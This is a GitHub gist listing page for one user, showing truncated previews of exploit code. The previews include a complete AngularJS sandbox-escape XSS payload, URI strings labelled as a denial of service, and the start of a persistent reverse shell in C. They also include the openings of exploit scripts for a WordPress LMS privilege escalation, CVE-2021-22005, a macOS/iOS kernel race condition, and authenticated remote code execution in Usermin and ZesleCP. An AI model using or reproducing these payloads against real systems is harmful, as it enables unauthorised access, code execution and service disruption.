Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
🕳️

numan numanturle

🕳️
303 followers · 191 following
View GitHub Profile
@numanturle
numanturle / gist:de9e094f9f4c99be984eea135dd3d0b6
Created February 27, 2022 11:00
pwwned.html
{{x={"n":"".constructor.prototype};x["n"].charAt=[].join;$eval("x=alert(\"pwned --> numanturle\")");}}
@numanturle
numanturle / shellcode.c
Created February 25, 2022 22:14
reference : https://east-trowel-102.notion.site/CVE-2021-XXXX-rce-via-crafted-payload-in-an-ipv6-address-input-field-hidden-EN-98e24b6f841043fba17ec4627c34f5d1
// Simple Persistent Reverse Shell
// Compile for MIPSBE using the following steps:
// 1) cp reverse_shell_mipsbe.c /tmp/
// 2) using buildroot toolchain for compile mipsel-buildroot-linux-uclibc-gcc-10.3.0
// 4) cd /tmp ; output/host/bin/mipsel-buildroot-linux-uclibc-gcc-10.3.0 -static /home/sasaga/Escritorio/shellcode/rev.c -o /home/sasaga/Escritorio/shellcode/rev
// Outside Docker:
// 5) cp /tmp/rev .
#include <sys/types.h>
#include <sys/socket.h>
@numanturle
numanturle / gist:e1e85b9eaa73d7a427e355356d507bbb
Created February 24, 2022 09:30
192.168.0.28
192.168.0.29
192.168.0.197
192.168.0.99
192.168.0.210
192.168.0.212
192.168.0.211
192.168.0.249
@numanturle
numanturle / Exploit.js
Created January 30, 2022 10:51
MasterStudy LMS – WordPress LMS Plugin 2.7.5 - Privilege Escalation (Unauthenticated)
function randomInt(min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
jQuery(document).ready(function($){
username = "poctesting"+randomInt(1,1337);
password_poc = "S3cr3t"+randomInt(1,1337);
nonce = stm_lms_nonces.stm_lms_register
post_data = {
@numanturle
numanturle / gist:c315257a6020395e2e47cc555d6f5202
Created January 15, 2022 13:33
DOS
ms-cxh-full://
ms-cxh:/
@numanturle
numanturle / hello.asm
Created December 12, 2021 21:05
.data
/* Data segment: define our message string and calculate its length. */
msg:
.ascii "Hello, ARM64!\n"
len = . - msg
.text
/* Our application's entry point. */
@numanturle
numanturle / CVE-2021-22005.py
Created October 4, 2021 12:28 — forked from testanull/asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
@numanturle
numanturle / poc.c
Created September 16, 2021 08:44 — forked from infernalheaven/poc.c
macOS 11.5.2/iOS 14.7.1 Kernel Race Condition poc
/*
Written By Pan ZhenPeng(@peterpan980927) of Alibaba Security Pandora Lab
use it on macOS: cc poc.c -o poc while True; do ./poc ; done
*/
#include <errno.h>
#include <signal.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
@numanturle
numanturle / usermin.py
Created August 27, 2021 15:57
Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Remote Code Execution (Authenticated) ( Version 1.820 )
# author: twitter.com/numanturle
# usage: usermin.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://youtu.be/wiRIWFAhz24
import argparse,requests,warnings,json,re
from requests.packages.urllib3.exceptions import InsecureRequestWarning
@numanturle
numanturle / zeslecp.py
Created August 27, 2021 13:21
ZesleCP 3.1.9 - Remote Code Execution (RCE) (Authenticated)
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# ZesleCP - Remote Code Execution (Authenticated) ( Version 3.1.9 )
# author: twitter.com/numanturle
# usage: zeslecp.py [-h] -u HOST -l LOGIN -p PASSWORD
# https://www.youtube.com/watch?v=5lTDTEBVq-0
import argparse,requests,warnings,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning